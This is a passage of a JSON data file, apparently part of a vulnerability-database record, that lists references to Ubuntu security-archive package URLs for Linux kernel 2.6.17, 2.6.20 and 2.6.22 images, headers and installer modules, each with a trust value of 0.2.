        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.42_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-xen_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-server_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.47_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.33_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc64-smp_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.33.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc-smp_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-xen_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-virtual_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-386_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
